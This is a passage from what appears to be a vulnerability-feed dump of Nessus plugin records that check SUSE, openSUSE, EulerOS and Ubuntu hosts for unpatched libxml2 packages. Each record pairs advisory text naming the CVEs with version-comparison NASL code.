(rpm_check(release:\"SLES12\", sp:\"2\", reference:\"python-libxml2-debugsource-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libxml2-2-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libxml2-2-32bit-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libxml2-2-debuginfo-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libxml2-2-debuginfo-32bit-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libxml2-debugsource-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libxml2-tools-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libxml2-tools-debuginfo-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"python-libxml2-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"python-libxml2-debuginfo-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"python-libxml2-debugsource-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-2-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-2-32bit-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-2-debuginfo-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-2-debuginfo-32bit-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-debugsource-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-tools-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-tools-debuginfo-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"python-libxml2-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"python-libxml2-debuginfo-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"python-libxml2-debugsource-2.9.4-46.12.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:49", "description": "This update for libxml2 fixes three security issues :\n\n - CVE-2017-15412: Prevent use after free when calling XPath extension functions that allowed remote attackers to cause DoS or potentially RCE (bsc#1077993)\n\n - CVE-2016-5131: Use-after-free vulnerability in libxml2 allowed remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function. (bsc#1078813)\n\n - CVE-2017-5130: Fixed a potential remote buffer overflow in function xmlMemoryStrdup() (bsc#1078806)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update project.", "cvss3": {}, "published": "2018-02-12T00:00:00", "type": "nessus", "title": "openSUSE Security Update : libxml2 (openSUSE-2018-154)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5131", "CVE-2017-15412", "CVE-2017-5130"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libxml2-2", "p-cpe:/a:novell:opensuse:libxml2-2-32bit", "p-cpe:/a:novell:opensuse:libxml2-2-debuginfo", "p-cpe:/a:novell:opensuse:libxml2-2-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libxml2-debugsource", "p-cpe:/a:novell:opensuse:libxml2-devel", "p-cpe:/a:novell:opensuse:libxml2-devel-32bit", "p-cpe:/a:novell:opensuse:libxml2-tools", "p-cpe:/a:novell:opensuse:libxml2-tools-debuginfo", "p-cpe:/a:novell:opensuse:python-libxml2", "p-cpe:/a:novell:opensuse:python-libxml2-debuginfo", "p-cpe:/a:novell:opensuse:python-libxml2-debugsource", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2018-154.NASL", "href": "https://www.tenable.com/plugins/nessus/106741", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-154.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106741);\n script_version(\"3.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-5131\", \"CVE-2017-15412\", \"CVE-2017-5130\");\n\n script_name(english:\"openSUSE Security Update : libxml2 (openSUSE-2018-154)\");\n script_summary(english:\"Check for the openSUSE-2018-154 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libxml2 fixes three security issues :\n\n - CVE-2017-15412: Prevent use after free when calling\n XPath extension functions that allowed remote attackers\n to cause DoS or potentially RCE (bsc#1077993)\n\n - CVE-2016-5131: Use-after-free vulnerability in libxml2\n allowed remote attackers to cause a denial of service or\n possibly have unspecified other impact via vectors\n related to the XPointer range-to function. (bsc#1078813)\n\n - CVE-2017-5130: Fixed a potential remote buffer overflow\n in function xmlMemoryStrdup() (bsc#1078806)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1077993\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1078806\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1078813\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libxml2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-2-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-libxml2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-libxml2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libxml2-2-2.9.4-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libxml2-2-debuginfo-2.9.4-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libxml2-debugsource-2.9.4-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libxml2-devel-2.9.4-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libxml2-tools-2.9.4-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libxml2-tools-debuginfo-2.9.4-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"python-libxml2-2.9.4-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"python-libxml2-debuginfo-2.9.4-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"python-libxml2-debugsource-2.9.4-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libxml2-2-32bit-2.9.4-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libxml2-2-debuginfo-32bit-2.9.4-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libxml2-devel-32bit-2.9.4-15.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2-2 / libxml2-2-32bit / libxml2-2-debuginfo / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:29:07", "description": "According to the versions of the libxml2 packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function.(CVE-2016-5131)\n\n - parser.c in libxml2 before 2.9.5 mishandles parameter-entity references because the NEXTL macro calls the xmlParserHandlePEReference function in the case of a '%' character in a DTD name.(CVE-2017-16931)\n\n - parser.c in libxml2 before 2.9.5 does not prevent infinite recursion in parameter entities.)CVE-2017-16932)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-06-28T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP3 : libxml2 (EulerOS-SA-2018-1156)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5131", "CVE-2017-16931", "CVE-2017-16932"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libxml2", "p-cpe:/a:huawei:euleros:libxml2-devel", "p-cpe:/a:huawei:euleros:libxml2-python", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2018-1156.NASL", "href": "https://www.tenable.com/plugins/nessus/110732", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110732);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-5131\",\n \"CVE-2017-16931\",\n \"CVE-2017-16932\"\n );\n\n script_name(english:\"EulerOS 2.0 SP3 : libxml2 (EulerOS-SA-2018-1156)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the libxml2 packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - Use-after-free vulnerability in libxml2 through 2.9.4,\n as used in Google Chrome before 52.0.2743.82, allows\n remote attackers to cause a denial of service or\n possibly have unspecified other impact via vectors\n related to the XPointer range-to\n function.(CVE-2016-5131)\n\n - parser.c in libxml2 before 2.9.5 mishandles\n parameter-entity references because the NEXTL macro\n calls the xmlParserHandlePEReference function in the\n case of a '%' character in a DTD name.(CVE-2017-16931)\n\n - parser.c in libxml2 before 2.9.5 does not prevent\n infinite recursion in parameter\n entities.)CVE-2017-16932)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1156\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b2b7c04b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libxml2 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libxml2-2.9.1-6.3.h10\",\n \"libxml2-devel-2.9.1-6.3.h10\",\n \"libxml2-python-2.9.1-6.3.h10\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:28:11", "description": "According to the versions of the libxml2 packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function.(CVE-2016-5131)\n\n - parser.c in libxml2 before 2.9.5 mishandles parameter-entity references because the NEXTL macro calls the xmlParserHandlePEReference function in the case of a '%' character in a DTD name.(CVE-2017-16931)\n\n - parser.c in libxml2 before 2.9.5 does not prevent infinite recursion in parameter entities.)CVE-2017-16932)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-05-02T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP1 : libxml2 (EulerOS-SA-2018-1088)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5131", "CVE-2017-16931", "CVE-2017-16932"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libxml2", "p-cpe:/a:huawei:euleros:libxml2-devel", "p-cpe:/a:huawei:euleros:libxml2-python", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2018-1088.NASL", "href": "https://www.tenable.com/plugins/nessus/109486", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109486);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-5131\",\n \"CVE-2017-16931\",\n \"CVE-2017-16932\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : libxml2 (EulerOS-SA-2018-1088)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the libxml2 packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - Use-after-free vulnerability in libxml2 through 2.9.4,\n as used in Google Chrome before 52.0.2743.82, allows\n remote attackers to cause a denial of service or\n possibly have unspecified other impact via vectors\n related to the XPointer range-to\n function.(CVE-2016-5131)\n\n - parser.c in libxml2 before 2.9.5 mishandles\n parameter-entity references because the NEXTL macro\n calls the xmlParserHandlePEReference function in the\n case of a '%' character in a DTD name.(CVE-2017-16931)\n\n - parser.c in libxml2 before 2.9.5 does not prevent\n infinite recursion in parameter\n entities.)CVE-2017-16932)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1088\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3344f26e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libxml2 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libxml2-2.9.1-6.3.h10\",\n \"libxml2-devel-2.9.1-6.3.h10\",\n \"libxml2-python-2.9.1-6.3.h10\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:10:42", "description": "It was discovered that libxml2 incorrectly handled format strings. If a user or automated system were tricked into opening a specially crafted document, an attacker could possibly cause libxml2 to crash, resulting in a denial of service. This issue only affected Ubuntu 12.04 LTS, Ubuntu 14.04 LTS, and Ubuntu 16.04 LTS. (CVE-2016-4448)\n\nIt was discovered that libxml2 incorrectly handled certain malformed documents. If a user or automated system were tricked into opening a specially crafted document, an attacker could cause libxml2 to crash, resulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2016-4658)\n\nNick Wellnhofer discovered that libxml2 incorrectly handled certain malformed documents. If a user or automated system were tricked into opening a specially crafted document, an attacker could cause libxml2 to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2016-5131).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-03-17T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS / 16.10 : libxml2 vulnerabilities (USN-3235-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4448", "CVE-2016-4658", "CVE-2016-5131"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libxml2", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:16.10"], "id": "UBUNTU_USN-3235-1.NASL", "href": "https://www.tenable.com/plugins/nessus/97793", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3235-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97793);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2016-4448\", \"CVE-2016-4658\", \"CVE-2016-5131\");\n script_xref(name:\"USN\", value:\"3235-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS / 16.10 : libxml2 vulnerabilities (USN-3235-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that libxml2 incorrectly handled format strings. If\na user or automated system were tricked into opening a specially\ncrafted document, an attacker could possibly cause libxml2 to crash,\nresulting in a denial of service. This issue only affected Ubuntu\n12.04 LTS, Ubuntu 14.04 LTS, and Ubuntu 16.04 LTS. (CVE-2016-4448)\n\nIt was discovered that libxml2 incorrectly handled certain malformed\ndocuments. If a user or automated system were tricked into opening a\nspecially crafted document, an attacker could cause libxml2 to crash,\nresulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2016-4658)\n\nNick Wellnhofer discovered that libxml2 incorrectly handled certain\nmalformed documents. If a user or automated system were tricked into\nopening a specially crafted document, an attacker could cause libxml2\nto crash, resulting in a denial of service, or possibly execute\narbitrary code. (CVE-2016-5131).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3235-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected libxml2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 